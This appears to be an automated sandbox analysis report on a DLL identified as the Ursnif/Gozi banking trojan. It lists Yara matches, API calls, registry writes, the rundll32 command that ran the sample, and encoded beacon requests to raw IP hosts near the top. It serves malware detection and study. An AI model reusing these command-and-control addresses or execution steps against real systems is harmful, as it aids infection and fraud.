      Source: global trafficHTTP traffic detected: GET /fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 80.77.23.77Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 80.77.25.109Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 170.130.165.182Connection: Keep-AliveCache-Control: no-cache

      Key, Mouse, Clipboard, Microphone and Screen Capturing

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
      Source: loaddll32.exe, 00000000.00000002.273024617.000000000154B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B96EB4 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_04B96EB4

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
      Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
      Writes registry values via WMI
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: Zeip.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
      Source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004023443_2_00402344
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401E2A3_2_00401E2A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B94CAB3_2_04B94CAB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B939B33_2_04B939B3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B92FED3_2_04B92FED
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B983CC3_2_04B983CC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0040154A GetProcAddress,NtCreateSection,memset,3_2_0040154A
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004015F2 NtMapViewOfSection,3_2_004015F2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401C21 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,3_2_00401C21
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402565 NtQueryVirtualMemory,3_2_00402565
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B96940 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_04B96940
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B985F1 NtQueryVirtualMemory,3_2_04B985F1
      Source: Zeip.dllBinary or memory string: OriginalFilenameuild_era_epmh.dllF vs Zeip.dll
      Source: Zeip.dllVirustotal: Detection: 31%
      Source: Zeip.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\Zeip.dll"
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2407.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winDLL@9/12@4/3
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B928F6 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_04B928F6
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5308
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_01
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Zeip.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: ZR@4Hk*7L7H|SDs!u.pdb source: loaddll32.exe, 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp, Zeip.dll
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_004022E0 push ecx; ret 3_2_004022E9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402333 push ecx; ret 3_2_00402343
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B9B859 push 0000006Fh; retf 3_2_04B9B85C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B983BB push ecx; ret 3_2_04B983CB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B97FD0 push ecx; ret 3_2_04B97FD9
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401385 LoadLibraryA,GetProcAddress,3_2_00401385

      Hooking and other Techniques for Hiding and Protection

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
